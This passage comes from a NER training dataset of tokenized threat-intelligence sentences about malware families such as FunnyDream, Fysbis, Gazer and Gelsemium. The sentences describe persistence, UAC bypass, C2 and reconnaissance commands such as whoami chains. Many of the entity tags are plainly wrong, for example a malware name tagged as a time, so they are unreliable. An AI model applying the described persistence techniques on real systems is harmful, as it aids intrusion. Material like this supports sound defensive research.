"FunnyDream", - "can", - "connect", - "to", - "HTTP", - "proxies", - "via", - "TCP", - "to", - "create", - "a", - "tunnel", - "to", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "identify", - "and", - "use", - "configured", - "proxies", - "in", - "a", - "compromised", - "network", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "check", - "`Software\\Microsoft\\Windows\\CurrentVersion\\Internet", - "Settings`", - "to", - "extract", - "the", - "`ProxyServer`", - "string." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "use", - "a", - "Registry", - "Run", - "Key", - "and", - "the", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "collect", - "information", - "about", - "hosts", - "on", - "the", - "victim", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "use", - "`rundll32`", - "for", - "execution", - "of", - "its", - "components." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "FunnyDream", - "ScreenCap", - "component", - "can", - "take", - "screenshots", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "identify", - "the", - "processes", - "for", - "Bkav", - "antivirus." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "enumerate", - "all", - "logical", - "drives", - "on", - "a", - "targeted", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "parse", - "the", - "`ProxyServer`", - "string", - "in", - "the", - "Registry", - "to", - "discover", - "http", - "proxies." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "the", - "ability", - "to", - "gather", - "user", - "information", - "from", - "the", - "targeted", - "system", - "using", - "`whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "check", - "system", - "time", - "to", - "help", - "determine", - "when", - "changes", - "were", - "made", - "to", - "specified", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "use", - "`cmd.exe`", - "for", - "execution", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "use", - "WMI", - "to", - "open", - "a", - "Windows", - "command", - "shell", - "on", - "a", - "remote", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "established", - "persistence", - "by", - "running", - "`sc.exe`", - "and", - "by", - "setting", - "the", - "`WSearch`", - "service", - "to", - "run", - "automatically." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "been", - "encrypted", - "using", - "XOR", - "and", - "RC4." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "the", - "ability", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "the", - "ability", - "to", - "search", - "for", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "can", - "perform", - "keylogging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "masqueraded", - "as", - "the", - "rsyncd", - "and", - "dbus-inotifier", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "masqueraded", - "as", - "trusted", - "software", - "rsyncd", - "and", - "dbus-inotifier." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "can", - "collect", - "information", - "about", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "can", - "use", - "Base64", - "to", - "encode", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "used", - "the", - "command", - "<code>ls", - "/etc", - "|", - "egrep", - "-e\"fedora\\*|debian\\*|gentoo\\*|mandriva\\*|mandrake\\*|meego\\*|redhat\\*|lsb-\\*|sun-\\*|SUSE\\*|release\"</code>", - "to", - "determine", - "which", - "Linux", - "OS", - "version", - "is", - "running." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "established", - "persistence", - "using", - "a", - "systemd", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Fysbis", - "has", - "the", - "ability", - "to", - "create", - "and", - "execute", - "commands", - "in", - "a", - "remote", - "shell", - "for", - "CLI." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "executing", - "without", - "root", - "privileges,", - "Fysbis", - "adds", - "a", - "`.desktop`", - "configuration", - "file", - "to", - "the", - "user's", - "`~/.config/autostart`", - "directory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "GLASSTOKEN", - "has", - "the", - "ability", - "to", - "decode", - "hexadecimal", - "and", - "Base64", - "C2", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GLASSTOKEN", - "can", - "use", - "PowerShell", - "for", - "command", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GLASSTOKEN", - "has", - "hexadecimal", - "and", - "Base64", - "encoded", - "C2", - "content." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GLASSTOKEN", - "is", - "a", - "web", - "shell", - "capable", - "of", - "tunneling", - "C2", - "connections", - "and", - "code", - "execution", - "on", - "compromised", - "Ivanti", - "Secure", - "Connect", - "VPNs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GLOOXMAIL", - "communicates", - "to", - "servers", - "operated", - "by", - "Google", - "using", - "the", - "Jabber/XMPP", - "protocol." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "a", - "reconnaissance", - "module", - "that", - "can", - "be", - "used", - "to", - "retrieve", - "Windows", - "domain", - "membership", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "is", - "written", - "in", - "and", - "executed", - "as", - "JavaScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "PowerShell", - "to", - "execute", - "the", - "Meterpreter", - "downloader", - "TinyMet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "a", - "persistence", - "module", - "that", - "stores", - "the", - "implant", - "inside", - "the", - "Registry,", - "which", - "executes", - "at", - "logon." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "<code>sctasks</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "a", - "screenshot", - "module", - "that", - "can", - "be", - "used", - "to", - "take", - "a", - "screenshot", - "of", - "the", - "remote", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "a", - "reconnaissance", - "module", - "that", - "can", - "be", - "used", - "to", - "retrieve", - "information", - "about", - "a", - "victim's", - "computer,", - "including", - "the", - "resolution", - "of", - "the", - "workstation", - "." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GRIFFON", - "has", - "used", - "a", - "reconnaissance", - "module", - "that", - "can", - "be", - "used", - "to", - "retrieve", - "the", - "date", - "and", - "time", - "of", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "uses", - "custom", - "encryption", - "for", - "C2", - "that", - "uses", - "RSA." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Gazer", - "versions", - "are", - "signed", - "with", - "various", - "valid", - "certificates;", - "one", - "was", - "likely", - "faked", - "and", - "issued", - "by", - "Comodo", - "for", - "\"Solid", - "Loop", - "Ltd,\"", - "and", - "another", - "was", - "issued", - "for", - "\"Ultimate", - "Computer", - "Support", - "Ltd.\"" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "logs", - "its", - "actions", - "into", - "files", - "that", - "are", - "encrypted", - "with", - "3DES.", - "It", - "also", - "uses", - "RSA", - "to", - "encrypt", - "resources." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "has", - "commands", - "to", - "delete", - "files", - "and", - "persistence", - "mechanisms", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "can", - "execute", - "a", - "task", - "to", - "download", - "a", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "stores", - "configuration", - "items", - "in", - "alternate", - "data", - "streams", - "(ADSs)", - "if", - "the", - "Registry", - "is", - "not", - "accessible." - ], - "ner_tags": [ - "B-Idus", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "injects", - "its", - "communication", - "module", - "into", - "an", - "Internet", - "accessible", - "process", - "through", - "which", - "it", - "performs", - "C2." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "can", - "establish", - "persistence", - "by", - "creating", - "a", - ".lnk", - "file", - "in", - "the", - "Start", - "menu." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "can", - "establish", - "persistence", - "by", - "creating", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "can", - "establish", - "persistence", - "through", - "the", - "system", - "screensaver", - "by", - "configuring", - "it", - "to", - "execute", - "the", - "malware." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "can", - "establish", - "persistence", - "by", - "creating", - "a", - ".lnk", - "file", - "in", - "the", - "Start", - "menu", - "or", - "by", - "modifying", - "existing", - ".lnk", - "files", - "to", - "execute", - "the", - "malware", - "through", - "cmd.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Gazer", - "uses", - "custom", - "encryption", - "for", - "C2", - "that", - "uses", - "3DES." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Gazer", - "obtains", - "the", - "current", - "user's", - "security", - "identifier." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "performs", - "thread", - "execution", - "hijacking", - "to", - "inject", - "its", - "orchestrator", - "into", - "a", - "running", - "thread", - "from", - "a", - "remote", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "early", - "Gazer", - "versions,", - "the", - "compilation", - "timestamp", - "was", - "faked." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gazer", - "communicates", - "with", - "its", - "C2", - "servers", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Gazer", - "can", - "establish", - "persistence", - "by", - "setting", - "the", - "value", - "“Shell”", - "with", - "“explorer.exe,", - "%malware_pathfile%”", - "under", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "token", - "manipulation", - "to", - "bypass", - "UAC", - "on", - "Windows7", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "junk", - "code", - "to", - "hide", - "functions", - "and", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "bypass", - "UAC", - "to", - "elevate", - "process", - "privileges", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "the", - "`IARPUinstallerStringLauncher`", - "COM", - "interface", - "are", - "part", - "of", - "its", - "UAC", - "bypass", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "use", - "DNS", - "in", - "communication", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "decompress", - "and", - "decrypt", - "DLLs", - "and", - "shellcode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "dynamic", - "DNS", - "domain", - "names", - "in", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "inject", - "DLLs", - "into", - "specific", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "compress", - "its", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "multiple", - "domains", - "and", - "protocols", - "in", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "delete", - "its", - "dropper", - "component", - "from", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "retrieve", - "data", - "from", - "specific", - "Windows", - "directories,", - "as", - "well", - "as", - "open", - "random", - "files", - "as", - "part", - "of", - "Virtualization/Sandbox", - "Evasion." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "store", - "its", - "components", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "download", - "additional", - "plug-ins", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "used", - "unverified", - "signatures", - "on", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "named", - "malicious", - "binaries", - "`serv.exe`,", - "`winprint.dll`,", - "and", - "`chrome_elf.dll`", - "and", - "has", - "set", - "its", - "persistence", - "in", - "the", - "Registry", - "with", - "the", - "key", - "value", - "<code>Chrome", - "Update</code>", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "modify", - "the", - "Registry", - "to", - "store", - "its", - "components." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "use", - "various", - "Windows", - "API", - "functions", - "to", - "perform", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "use", - "TCP", - "and", - "UDP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "drop", - "itself", - "in", - "<code>C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll</code>", - "to", - "be", - "loaded", - "automatically", - "by", - "the", - "spoolsv", - "Windows", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "enumerate", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "open", - "random", - "files", - "and", - "Registry", - "keys", - "to", - "obscure", - "malware", - "behavior", - "from", - "sandbox", - "analysis." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "custom", - "shellcode", - "to", - "map", - "embedded", - "DLLs", - "into", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "set", - "persistence", - "with", - "a", - "Registry", - "run", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "check", - "for", - "the", - "presence", - "of", - "specific", - "security", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "determine", - "the", - "operating", - "system", - "and", - "whether", - "a", - "targeted", - "machine", - "has", - "a", - "32", - "or", - "64", - "bit", - "architecture." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "distinguish", - "between", - "a", - "standard", - "user", - "and", - "an", - "administrator", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "has", - "the", - "ability", - "to", - "perform", - "timestomping", - "of", - "files", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "junk", - "code", - "to", - "generate", - "random", - "activity", - "to", - "obscure", - "malware", - "behavior." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "HTTP/S", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "use", - "a", - "batch", - "script", - "to", - "delete", - "itself." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gelsemium", - "can", - "drop", - "itself", - "in", - "`C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll`", - "as", - "an", - "alternative", - "Print", - "Processor", - "to", - "be", - "loaded", - "automatically", - "when", - "the", - "spoolsv", - "Windows", - "service", - "starts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GeminiDuke", - "collects", - "information", - "from", - "the", - "victim,", - "including", - "installed", - "drivers,", - "programs", - "previously", - "executed", - "by", - "users,", - "programs", - "and", - "services", - "configured", - "to", - "automatically", - "run", - "at", - "startup,", - "files", - "and", - "folders", - "present", - "in", - "any", - "user's", - "home", - "folder,", - "files", - "and", - "folders", - "present", - "in", - "any", - "user's", - "My", - "Documents,", - "programs", - "installed", - "to", - "the", - "Program", - "Files", - "folder,", - "and", - "recently", - "accessed", - "files,", - "folders,", - "and", - "programs." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GeminiDuke", - "collects", - "information", - "on", - "local", - "user", - "accounts", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GeminiDuke", - "collects", - "information", - "on", - "running", - "processes", - "and", - "environment", - "variables", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GeminiDuke", - "collects", - "information", - "on", - "network", - "settings", - "and", - "Internet", - "proxy", - "settings", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GeminiDuke", - "collects", - "information", - "on", - "programs", - "and", - "services", - "on", - "the", - "victim", - "that", - "are", - "configured", - "to", - "automatically", - "run", - "at", - "startup." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GeminiDuke", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - 